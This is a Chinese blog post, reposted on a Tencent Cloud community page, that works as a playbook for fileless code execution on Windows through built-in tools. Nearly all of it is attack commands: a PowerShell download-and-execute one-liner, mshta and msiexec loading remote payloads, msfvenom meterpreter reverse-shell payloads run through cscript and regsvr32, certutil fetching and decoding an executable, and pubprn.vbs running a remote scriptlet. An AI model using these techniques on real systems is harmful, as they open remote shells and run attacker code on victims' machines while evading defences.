前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >windows无exe

windows无exe

作者头像
全栈程序员站长
发布2022-09-14 13:11:00
1.6K0
发布2022-09-14 13:11:00
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

windows无exe

加载脚本方式

利用Windows自带的解析器:PowerShell、VBScript、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.exe和mshta.exe。利用上传或远程加载对应payload脚本,直接调用解析器运行(可以使用Invoke-Obfuscation或者 Invoke-DOSfuscation 等进行混淆) 用Windows自带的工具或脚本等原生工具实现执行恶意代码、启动程序、执行脚本、窃取数据、横向扩展、维持访问等,常用的有regsvr32.exe、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等,脚本类型的有:winrm.vbs、wmiexec.vbs、pubprn.vbs等

恶意脚本加载

powershell

代码语言:javascript
复制
powershell "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Script.ps1'); Script [argv]"

mshta.exe

msf

代码语言:javascript
复制
use exploit/windows/misc/hta_server
set lhost x.x.x.x
set lport 4444
run

windows执行

代码语言:javascript
复制
mshta http://192.168.164.128:8080/lWdH9aFeeIe.hta
在这里插入图片描述
在这里插入图片描述

CScript.exe&WScript.exe

上述两个工具都可以解析运行vbs和js的脚本。但值得注意的是WScript是将输出结果以对话框的形式显示,而CScript是以命令行的形式显示输出结果。使用也很简单:cscript %TEMP%\log.vbs 或者 wscript C:\test.js

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f vbs -o 123.vbs
代码语言:javascript
复制
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run
代码语言:javascript
复制
cscript 123.vbs

Windows原生工具加载

regsvr32.exe

dll

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f dll -o 123.dll
代码语言:javascript
复制
regsvr32 /u /s 123.dll

sct

参考 https://github.com/GreatSCT/GreatSCT

certutil.exe

代码语言:javascript
复制
certuil.exe -urlcache -split -f [URL] outfile.file
certutil.exe -verifyctl -f -split http://www.baidu.com #无法绕过defender

编码

代码语言:javascript
复制
base64 payload.exe > /var/www/html/update.txt

解码执行

代码语言:javascript
复制
certutril -urlcache -split -f http://cc_server/update.txt & certurl -decode update.txt update.exe & update.exe

winrm.vbs

代码语言:javascript
复制
cscript C:\windows\system32\winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -file:123.xml

123.xml

代码语言:javascript
复制
<?xml version="1.0" encoding="UTF-8"?>
<p:Create_INPUT xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process">
   <p:CommandLine>calc.exe</p:CommandLine>
   <p:CurrentDirectory>C:\</p:CurrentDirectory>
</p:Create_INPUT>
在这里插入图片描述
在这里插入图片描述

无文件

代码语言:javascript
复制
Winrm invoke Create wmicimv2/Win32_Process @{ 
   CommandLine="calc.exe";CurrentDirectory="C:\"}
在这里插入图片描述
在这里插入图片描述

msiexec.exe

代码语言:javascript
复制
C:\Windows\System32\msiexec.exe /q /i http://192.168.164.128:8080/123.msi

复现出错

wmic.exe

代码语言:javascript
复制
# 暂无

pubprn.vbs

C:\Windows\System32\Printing_Admin_Scripts 下语言目录下 可以用来解析sct

代码语言:javascript
复制
pubprn.vbs 127.0.0.1 script:http://x.x.x.x/payload1.sct

参考

https://github.com/GreatSCT/GreatSCT Windows-noFile

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/159696.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • windows无exe
  • 加载脚本方式
  • 恶意脚本加载
    • powershell
      • mshta.exe
        • CScript.exe&WScript.exe
        • Windows原生工具加载
          • regsvr32.exe
            • dll
            • sct
          • certutil.exe
            • winrm.vbs
              • msiexec.exe
                • wmic.exe
                  • pubprn.vbs
                  • 参考
                  领券
                  问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档